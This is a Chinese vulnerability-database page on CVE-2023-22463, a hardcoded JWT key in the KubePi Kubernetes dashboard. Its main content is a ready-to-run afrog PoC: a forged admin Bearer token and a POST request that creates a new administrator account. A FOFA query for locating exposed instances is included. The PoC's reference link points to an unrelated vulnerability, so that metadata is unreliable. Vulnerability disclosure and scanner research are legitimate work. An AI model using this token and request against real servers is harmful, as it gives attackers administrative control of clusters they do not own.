CVE-2023-22463: KubePi JwtSigKey 登陆绕过漏洞

日期: 2025-09-01 | 影响软件: KubePi | POC: 已公开

漏洞描述

KubePi 中存在 JWT硬编码,攻击者通过硬编码可以获取服务器后台管理权限,添加任意用户 FOFA: "kubepi"

PoC代码[已公开]

id: CVE-2023-22463

info:
  name: KubePi JwtSigKey 登陆绕过漏洞
  author: peiqi
  severity: high
  verified: true
  description: |
    KubePi 中存在 JWT硬编码,攻击者通过硬编码可以获取服务器后台管理权限,添加任意用户
    FOFA: "kubepi"
  reference:
    - https://peiqi.wgpsec.org/wiki/webapp/飞企互联/飞企互联%20FE业务协作平台%20ShowImageServlet%20任意文件读取漏洞.md
  tags: kubepi,bypass
  created: 2023/08/13

set:
  randstr: randomLowercase(12)
rules:
  r0:
    request:
      method: POST
      path: /kubepi/api/v1/users
      headers:
        Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJuYW1lIjoiYWRtaW4iLCJuaWNrTmFtZSI6IkFkbWluaXN0cmF0b3IiLCJlbWFpbCI6InN1cHBvcnRAZml0MmNsb3VkLmNvbSIsImxhbmd1YWdlIjoiemgtQ04iLCJyZXNvdXJjZVBlcm1pc3Npb25zIjp7fSwiaXNBZG1pbmlzdHJhdG9yIjp0cnVlLCJtZmEiOnsiZW5hYmxlIjpmYWxzZSwic2VjcmV0IjoiIiwiYXBwcm92ZWQiOmZhbHNlfX0.XxQmyfq_7jyeYvrjqsOZ4BB4GoSkfLO2NvbKCEQjld8
      body: |
        {
          "authenticate": {
              "password": "{{randstr}}"
          },
          "email": "{{randstr}}@qq.com",
          "isAdmin": true,
          "mfa": {
                  "enable": false
          },
          "name": "{{randstr}}",
          "nickName": "{{randstr}}",
          "roles": [
              "Supper User"
          ]
        }
    expression: response.status == 200 && response.body.bcontains(b'"password":') && response.body.bcontains(b'"isAdmin":')
expression: r0()
来源: https://github.com/zan8in/afrog/blob/main/pocs/afrog-pocs/CVE/2023/CVE-2023-22463.yaml

相关漏洞推荐